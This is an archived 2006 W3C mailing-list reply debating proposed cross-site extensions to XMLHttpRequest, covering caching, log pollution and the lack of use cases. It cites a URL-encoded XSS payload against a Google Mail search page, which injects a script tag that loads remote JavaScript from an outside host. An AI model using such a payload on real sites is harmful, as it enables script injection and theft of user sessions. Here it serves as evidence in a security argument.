Re: (XMLHttpRequest 2) Proposal for cross-site extensions to XMLHttpRequest from Jim Ley on 2006-04-11 (public-webapi@w3.org from April 2006)

From: Jim Ley <jim@jibbering.com>
Date: Tue, 11 Apr 2006 22:21:57 +0100
To: <public-webapi@w3.org>
Message-ID: <003501c65dad$f6c74e20$2402a8c0@Snufkin>

"Ian Hickson" <ian@hixie.ch>
> - Caching means they can't be updated quickly for patching security
>   holes, especially on large sites (which ironically are the most
>   likely to be targetted).

Single location, with a NOT CROSS DOMAIN header available on individual 
URI's is workable, you've got the single location to stop inadvertant 
leakage, and the ability for a server to rapidly deny specific requests to 
specific uris.

I fail to see how a magic uri pollutes logs any more than any other 
request - the only time you'd get a request for one that wasn't available is 
if someone was using a resource they weren't allowed to use, the request for 
the real resource would be equally as polluting for the logs, except an 
author would no longer have accurate statistics [1] - how does the server 
tell a successful request from one that was swallowed by the client.  It 
would also have the advantage that a server that didn't understand the XHR 
rules wouldn't be forced to execute a lengthy process and return a large 
document only to have it discarded by the client.

Personally I think the WEB-API WG should not even be considering a Cross 
Domain XHR at this time, it's clear from examples such as

http://mail.google.com/search?hl=en&lr=&rls=GGLD%2CGGLD%3A2003-47%2CGGLD%3Aen&q=%3Cscript+src%3D%22http%3A%2F%2Fjibbering.com%2Ftest6.js%22%3EOR+%3Cscript%3Ebooks%3C%2Fscript%3E

That not even companies with the resources of Google can protect their 
flagship domains and services from XSS exploits (The above one has been 
public for over a week and not patched at time of posting) so the 
assumptions of the capability of authors shown in the discussion is probably 
unwarranted.   There are higher priority things to be finishing - test 
suites for the current specs.

Also once again, the first discussion on the list is a specification, where 
are the use case?  Please provide use cases of all new functionality before 
proposing a solution, it's silly to waste everyones time reviewing 
specifications when the use case for the spec. is not known.  Also the 
webapi WG has expressed a public preference to specify existing behaviour, 
there are existing solutions to the cross domain problem and a criticism of 
these solutions would be welcome before suggesting yet another method.

Cheers,

Jim.


[1] Not that they did before, but it's now even more unreliable as even the 
successful requests aren't an accurate count as failures exist only on the 
client.

Received on Tuesday, 11 April 2006 21:23:30 UTC